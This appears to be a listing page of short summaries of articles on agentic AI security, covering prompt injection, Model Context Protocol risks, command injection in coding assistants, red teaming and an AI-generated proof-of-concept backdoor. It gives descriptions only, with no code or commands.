Agentic AI and Security
Explores the unique security risks of Agentic AI systems, focusing on the 'Lethal Trifecta' of vulnerabilities and proposed mitigation strategies.
Explores the unique security risks of Agentic AI systems, focusing on the 'Lethal Trifecta' of vulnerabilities and proposed mitigation strategies.
Explores the A2AS framework and Agentgateway as a security approach to mitigate prompt injection attacks in AI/LLM systems by embedding behavioral contracts and cryptographic verification.
A framework for evaluating security threats and risks in Model Context Protocol (MCP) implementations, based on recent incidents.
Explores the emerging security research landscape around the Model Context Protocol (MCP), a new standard for AI model communication.
A developer's cautionary tale about command injection vulnerabilities in AI coding assistants using MCP servers, highlighting real-world security risks.
Analyzes the security risks of Model Context Protocols (MCPs), framing them as prompts that instruct AIs to execute third-party code.
A recap of organizing and speaking at Global Azure Quebec 2025, focusing on AI red teaming and securing generative AI workloads.
Argues that AI security levels are determined by market forces and user behavior, not by individual efforts, and will reach a functional equilibrium.
A penetration tester demonstrates AI security risks by having an AI generate stealthy malicious code for a proof-of-concept backdoor.